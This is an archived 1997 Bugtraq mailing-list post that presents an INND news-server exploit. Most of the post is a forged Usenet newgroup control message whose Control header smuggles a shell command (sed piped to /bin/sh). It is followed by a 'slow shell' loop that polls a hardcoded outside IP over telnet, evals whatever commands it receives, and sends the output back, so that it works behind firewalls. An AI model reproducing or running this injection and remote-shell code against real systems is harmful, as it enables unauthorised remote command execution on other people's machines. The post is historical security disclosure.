[4185] in bugtraq

home help back first fref pref prev next nref lref last post

INND exploit Works behind firewalls

daemon@ATHENA.MIT.EDU (Rikhardur Egilsson)
Tue Mar 18 11:08:08 1997

Date: 	Tue, 18 Mar 1997 09:25:43 +0000
Reply-To: Rikhardur Egilsson <k97161@SKYRR.IS>
From: Rikhardur Egilsson <k97161@SKYRR.IS>
To: BUGTRAQ@NETSPACE.ORG

A part of the first innd exploit was a remote shell that would be
effective behind firewalls.

Along with a replaced 'telnetd' on the attackers computer, this can be
used as a "slow shell" to execute commands on a target behind a firewall.

Enjoy the reading ,,

#################### START SLOW SHELL #################################
Path: skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9020@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while :; do
  IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
  if [ X"$IN" != X"$OIN" ]; then
    (/bin/sleep 2; eval "$IN" 2>&1) |
      /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
    OIN=$IN
  fi
  sleep 30
done
#-

#################### END SLOW SHELL #################################



--
rikardur@skyrr.is   -     Skyrr Ltd     -  Iceland Information Management
Rikhardur Egilsson  - System Programmer -  UNIX Admin - Tel : +354-5695100
Armuli 2  -  IS-108 Reykjavik -   Iceland  -  Fax : +354-5695251
home help back first fref pref prev next nref lref last post